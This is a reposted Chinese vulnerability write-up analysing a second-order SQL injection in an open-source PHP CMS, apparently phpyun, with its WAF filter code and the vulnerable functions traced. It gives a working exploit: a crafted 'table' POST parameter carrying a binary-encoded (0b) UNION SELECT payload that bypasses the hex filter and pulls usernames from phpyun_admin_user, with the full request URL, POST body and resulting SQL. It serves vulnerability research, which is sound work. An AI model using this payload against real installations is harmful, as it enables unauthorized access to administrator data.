您当前的位置:首页 > 电脑百科 > 安全防护 > 服务器/网站

某php开源cms有趣的二次注入

时间:2020-01-02 15:28:15  来源:  作者:

某php开源cms有趣的二次注入

 

一.漏洞说明

这个漏洞涉及到了MySQL中比较有意思的两个知识点以及以table作为二次注入的突破口,非常的有意思。

此cms的防注入虽然是很变态的,但是却可以利用mysql的这两个特点绕过防御。本次的漏洞是出现在ndex.class.php中的likejob_action()和saveresumeson_action()函数,由于这两个函数对用户的输入没有进行严格的显示,同时利用mysql的特点能够绕过waf。

PS:此漏洞的触发需要在WAP环境下,所以在进行调试的时候需要修改浏览器的ua为Mozilla/5.0 (linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (Khtml, like Gecko) Chrome/64.0.3282.186 Mobile Safari/537.36。

 

二.漏洞分析

mysql特点

特点1

传统的插入方式可能大家想到的都是insert into test(id,content,title) values(1,'hello','hello')。

如果我们仅仅值需要插入一条记录,则使用insert into test(content) values('hello2')。

如下图所示:

某php开源cms有趣的二次注入

 

但是实际上还存在另外一种方式能够仅仅值插入一条记录。

insert into test set content='hello3';
某php开源cms有趣的二次注入

 

可以看到这种方式和insert into test(content) values('hello2')是一样的。

说明插入数据时,利用values()和通过=指定列的方式结果都一样


特点2

我们知道mysql中能够使用十六进制表示字符串。如下:

某php开源cms有趣的二次注入

 

其中0x68656c6c6f表示的就是hello

这是一个很常见的方式!

除了使用十六进制外,还可以使用二进制的方式进行插入。

hello的二进制是01101000 01100101 01101100 01101100 01101111,那么我们的SQL语句还可以这样写,insert into test set content=0b0110100001100101011011000110110001101111。

这种方式和insert into test(content) values (0b0110100001100101011011000110110001101111)是一样的。

mysql不仅可以使用十六进制插入,还可以使用二进制的方式插入

 

某php开源cms有趣的二次注入

 

waf防护分析

waf的防护是位于config/db.safety.php

其中的gpc2sql()过滤代码如下:

function gpc2sql($str, $str2) {    if (preg_match("/select|insert|update|delete|load_file|outfile/is", $str)) {        exit(safe_pape());    }    if (preg_match("/select|insert|update|delete|load_file|outfile/is", $str2)) {        exit(safe_pape());    }    $arr = array("sleep" => "Sleep", " and " => " an d ", " or " => " Or ", "xor" => "xOr", "%20" => " ", "select" => "Select", "update" => "Update", "count" => "Count", "chr" => "Chr", "truncate" => "Truncate", "union" => "Union", "delete" => "Delete", "insert" => "Insert", """ => "“", "'" => "“", "--" => "- -", "(" => "(", ")" => ")", "00000000" => "OOOOOOOO", "0x" => "Ox");    foreach ($arr as $key => $v) {        $str = preg_replace('/' . $key . '/isU', $v, $str);    }    return $str;}

可以看到将0x替换为了Ox,所以无法传入十六进制,但是我们却可以利用mysql中的二进制的特点,利用0b的方式传入我们需要的payload。

 

index.class.php漏洞分析

漏洞是位于wap/member/model/index.class.php中,漏洞产生的主要函数是位于likejob_action()和saveresumeson_action()中。

我们首先分析likejob_action()。

likejob_action()的主要代码如下:

某php开源cms有趣的二次注入

 

而DB_update_all()的代码如下:

function DB_update_all($tablename, $value, $where = 1,$pecial=''){    if($pecial!=$tablename){        $where =$this->site_fetchsql($where,$tablename);    }    $SQL = "UPDATE `" . $this->def . $tablename . "` SET $value WHERE ".$where;    $this->db->query("set sql_mode=''");    $return=$this->db->query($SQL);    return $return;}

也就是说,当数据进入到DB_update_all()之后就不会有任何的过滤。

那么漏洞点就在于resume_expect中的job_classid字段。

job_classid字段的内容的传递如下图所示:

某php开源cms有趣的二次注入

 

所以如如果我们控制了resume_expect中的job_classid字段,我们就能够修改这条语句了。

我们可以借助于saveresumeson_action()来向job_classid中插入我们的payload。

saveresumeson_action()的关键代码如下:

某php开源cms有趣的二次注入

 

可以看到$table是直接通过"resume_".$_POST['table']拼接的,这也就以为着$table是我们可控的,之后$table进入了$this->obj->update_once()中。

我们进入uptate_once()中:

某php开源cms有趣的二次注入

 

$table变量在update_once()没有进行任何的处理,直接进入到DB_update_all()中,我们追踪进入到DB_update_all()中:

某php开源cms有趣的二次注入

 

同样没有进行任何的处理。

通过上面的跟踪分析,表明$table="resume_".$_POST['table'];赋值之后,中途$table变量没有进行任何的过滤直接进入了最终的SQL语句查询。

如此整个攻击链就成功了,我们通过saveresumeson_action()中的$table可控,对resume_expect中的job_classid进行修改,之后通过likejob_action()读取job_classid字段的内容,执行我们的SQL语句。

由于我们无法使用十六进制,此时我们就需要使用到二进制(0b)插入我们的payload。

 

三.漏洞复现

注册用户/创建简历

注册用户创建简历。

此时在phpyun_resume_expect中存在一条id=1的记录。

访问saveresumeson

我们访问saveresumeson对应的URL,写入我们的payload。根据语法,我们需要将table的内容设置为

expect' set class_id=1))/**/union/**/select/**/1,username,3,4,5,6,7,8,9,10,11,12/**/from/**/phpyun_admin_user #,uid=1 #

由于1))/**/union/**/select/**/1,username,3,4,5,6,7,8,9,10,11,12/**/from/**/phpyun_admin_user #无法绕过SQL的防御,需要转化为二进制,是001100010010100100101001001011110010101000101010001011110111010101101110011010010110111101101110001011110010101000101010001011110111001101100101011011000110010101100011011101000010111100101010001010100010111100110001001011000111010101110011011001010111001001101110011000010110110101100101001011000011001100101100001101000010110000110101001011000011011000101100001101110010110000111000001011000011100100101100001100010011000000101100001100010011000100101100001100010011001000101111001010100010101000101111011001100111001001101111011011010010111100101010001010100010111101110000011010000111000001111001011101010110111001011111011000010110010001101101011010010110111001011111011101010111001101100101011100100010000000100011

那么最终的payload是:

URL:http://localhost/wap//member/index.php?c=saveresumeson&eid=1POST:name=JAVA%e5%a4%a7%e6%95%b0%e6%8d%ae%e5%bc%80%e5%8f%91&sdate=2018-02&edate=2018-03&title=%e6%a0%b8%e5%bf%83%e5%bc%80%e5%8f%91%e4%ba%ba%e5%91%98&content=java%e5%a4%a7%e6%95%b0%e6%8d%ae%e5%ba%93%e5%bc%80%e5%8f%91&eid=1&id=&submit=%e4%bf%9d%e5%ad%98&table=expect%60set+job_classid%3d0b0011000100101001001010010010111100101010001010100010111101110101011011100110100101101111011011100010111100101010001010100010111101110011011001010110110001100101011000110111010000101111001010100010101000101111001100010010110001110101011100110110010101110010011011100110000101101101011001010010110000110011001011000011010000101100001101010010110000110110001011000011011100101100001110000010110000111001001011000011000100110000001011000011000100110001001011000011000100110010001011110010101000101010001011110110011001110010011011110110110100101111001010100010101000101111011100000110100001110000011110010111010101101110010111110110000101100100011011010110100101101110010111110111010101110011011001010111001000100011%2cuid%3d1+%23

此时我们执行的SQL语句是:

INSERT INTO `phpyun_resume_expect`set job_classid=0b001100010010100100101001001011110010101000101010001011110111010101101110011010010110111101101110001011110010101000101010001011110111001101100101011011000110010101100011011101000010111100101010001010100010111100110001001011000111010101110011011001010111001001101110011000010110110101100101001011000011001100101100001101000010110000110101001011000011011000101100001101110010110000111000001011000011100100101100001100010011000000101100001100010011000100101100001100010011001000101111001010100010101000101111011001100111001001101111011011010010111100101010001010100010111101110000011010000111000001111001011101010110111001011111011000010110010001101101011010010110111001011111011101010111001101100101011100100010000000100011,uid=1 #` SET

最终数据库中多了一条记录,如下:

某php开源cms有趣的二次注入

 

我们顺利地向job_classid中插入了我们的的payload

 

访问likejob_action触发payload

接下来我们访问http://localhost/member/index.php?c=likejob&id=7,其中的id就是刚刚我们插入的payload所对应记录的id。

当运行至DB_select_all()中执行的SQL语句是:

某php开源cms有趣的二次注入

 

为了便于分析,我们将这条SQL语句放入到datagrid中分析:

某php开源cms有趣的二次注入

 

最终在页面上显示admin的信息。

某php开源cms有趣的二次注入

 

至此整个漏洞都分析完毕了。

 

四.总结

一般来说,二次注入利用点一般都比较隐晦。

所以二次注入的思路比一般的注入更加巧妙和有意思,在本例中体现得尤为明显。

1.这个二次注入的点比较难找,二次注入中的利用table作为二次注入的利用点的例子还是比较少见的;

2.绕过方法也比较少见。本例中的waf的防护还是比较严格的,利用了mysql的两个少见特性就可以绕过了。

 

作者:天王盖地虎 转载自https://www.anquanke.com/post/id/170845



Tags:注入   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
前言目标是一大学,在一次挖洞过程中遇到个sql注入,尝试进一步利用扩大危害,漏洞已报送平台进行了修复私信我获取网络安全学习资料 1.2000多本网络安全系列电子书 2.网络安全标...【详细内容】
2021-11-26  Tags: 注入  点击:(21)  评论:(0)  加入收藏
本人也是小白一枚,大佬请绕过,这个其实是六月份的时候做的,那时候想多点实战经验,就直接用谷歌搜索找了一些网站,这个是其中一个1、目标网站 2、发现有WAF防护 3、判断存在注入...【详细内容】
2021-10-19  Tags: 注入  点击:(52)  评论:(0)  加入收藏
说明:本示例讲解的内容是给Windows_Server_2008_R2注入USB3.0,供大家参考。 一、所用工具软件 1. Dism++ 下载网址: http://www.chuyu.me/zh-Hans/index.html 2. 驱动程序文件(U...【详细内容】
2021-10-08  Tags: 注入  点击:(734)  评论:(0)  加入收藏
(一)SQL注入。1.如何理解SQL注入? SQL注入是一种将SQL代码添加到输入参数中,传递到SQL服务器解析并执行的一种攻击手法。2.SQL注入是如何产生的? web开发人员无法保证所有的输入...【详细内容】
2021-09-17  Tags: 注入  点击:(47)  评论:(0)  加入收藏
一 前言本文将针对开发过程中依旧经常出现的SQL编码缺陷,讲解其背后原理及形成原因。并以几个常见漏洞存在形式,提醒技术同学注意相关问题。最后会根据原理,提供解决或缓解方案...【详细内容】
2021-09-17  Tags: 注入  点击:(67)  评论:(0)  加入收藏
前言本人ctf选手一名,在最近做练习时遇到了一些sql注入的题目,但是sql注入一直是我的弱项之一,所以写一篇总结记录一下最近学到的一些sql注入漏洞的利用。可回显注入联合注入在...【详细内容】
2021-08-26  Tags: 注入  点击:(60)  评论:(0)  加入收藏
前言最近挖edusrc的时候遇到有注入点但是有waf绕不过,头疼。 可以看到还是phpstudy建站的,太熟悉了这个,不知道这个什么waf各位师傅知道的可以评论一下,所以写这篇文章是供各位...【详细内容】
2021-08-13  Tags: 注入  点击:(66)  评论:(0)  加入收藏
1. 使用 Burpsuite: 1. Capture the request using burpsuite. 2. Send the request to burp scanner. 3. Proceed with active scan. 4. Once the scan is finished, l...【详细内容】
2021-08-04  Tags: 注入  点击:(74)  评论:(0)  加入收藏
0×00:前言对于MYSQL知识的一个初总结 0×01:正文 MYSQL数据库特性1.Mysql数据库默认不区分大小写,利用此特性可以进行大小写过正则匹配,举个简单的例子,有的题目中只...【详细内容】
2021-07-29  Tags: 注入  点击:(88)  评论:(0)  加入收藏
在本地搭建服务器,httpd-vhosts.conf 中设置本地绑定的域名: 其中,zzzphp为下载的zzzphp cms的内容。然后,本机上的zzzphp cms的目录结构为如下: 在按照要求安装好cms后,本地cms的...【详细内容】
2021-07-16  Tags: 注入  点击:(80)  评论:(0)  加入收藏
▌简易百科推荐
在最近的一波攻击中,黑客利用多个插件中未修补的漏洞攻击了 160 万个 WordPress 网站。 易受攻击的插件对 WordPress 网站产生了的巨大攻击数据。 Wordfence 最近发现 WordPr...【详细内容】
2021-12-16  蚁安    Tags:WordPress   点击:(9)  评论:(0)  加入收藏
事件起因从安全分析系统里面发现一条带有病毒的下载,然后针对这条记录展开了一系列的分析分析过程1.登录到被感染服务器,查看系统状况,hadoop 这个用户在 2020/6/18 20:32 从这...【详细内容】
2021-11-23  Z2990Lig    Tags:SSH   点击:(32)  评论:(0)  加入收藏
1、除了服务器需要用的一些正规软件,其它都不要安装。2、在用户中把administrator改名,这样做的目的是即使对方暴破了我们的密码用户名也不容易猜住,相当于又加了一道关卡。...【详细内容】
2021-11-01  IT小哥吧    Tags:服务器   点击:(37)  评论:(0)  加入收藏
账户安全(1)更名administrator本地用户并禁用guest账户步骤:点击“开始”,找到“管理工具”,点击里面的“计算机管理”,找到“本地用户和组” (2)设定账户锁定策略尝试5次失败...【详细内容】
2021-10-12  Kali与编程  今日头条  Tags:Windows主机   点击:(62)  评论:(0)  加入收藏
本文主要介绍以Microsoft的Windows Server 2019 ,版本:Datacenter(Domain Controller)安全加固保护.企业随着规模不断扩大,业务增多,信息安全建设是企业里一条只有重点没有终点...【详细内容】
2021-09-17  Vireshark    Tags:服务器安全   点击:(64)  评论:(0)  加入收藏
目录常见共享命令IPC$IPC$的利用条件1:开启了139、445端口2:目标主机开启了IPC$共享3:IPC连接报错IPC空连接空连接可以做什么?(毫无作用)IPC$非空连接IPC$非空连接可以做什么?di...【详细内容】
2021-09-16  网络说安全    Tags:系统安全   点击:(86)  评论:(0)  加入收藏
昨天一个老哥找到我,说他的服务器这几天一直被CC攻击,问我这边有没有什么解决的方法? 近年来,网络攻击事件越来越频繁,最常见的就是CC攻击和DDOS攻击,主要的区别就是针对的对象不...【详细内容】
2021-09-10  小蚁GDRAGON    Tags:cc攻击   点击:(58)  评论:(0)  加入收藏
网站页面上的登录操作,通常都是输入帐号密码,传输至网站后台验证。在网站页面、数据传输中,通过技术手段,都可以得到用户输入的信息,并可以修改,从而发起网络攻击。典型的如:使用自...【详细内容】
2021-08-30  修丹道的程序猿    Tags:登录方式   点击:(62)  评论:(0)  加入收藏
网络安全研究人员披露了一类影响主要 DNS 即服务 (DNSaaS) 提供商的新漏洞,这些漏洞可能允许攻击者从企业网络中窃取敏感信息。基础设施安全公司 Wiz 的研究人员 Shir Tamar...【详细内容】
2021-08-12  零日时代    Tags:漏洞   点击:(66)  评论:(0)  加入收藏
001暴力破解1. 指定用户名爆破密码传统型爆破思路,用户名可以通过猜测或者信息收集获得。猜测:admin、网站域名等信息收集:新闻发布人、whoami等2. 指定密码爆破用户名如果是后...【详细内容】
2021-07-23  KaliMa  今日头条  Tags:登陆框   点击:(85)  评论:(0)  加入收藏
最新更新
栏目热门
栏目头条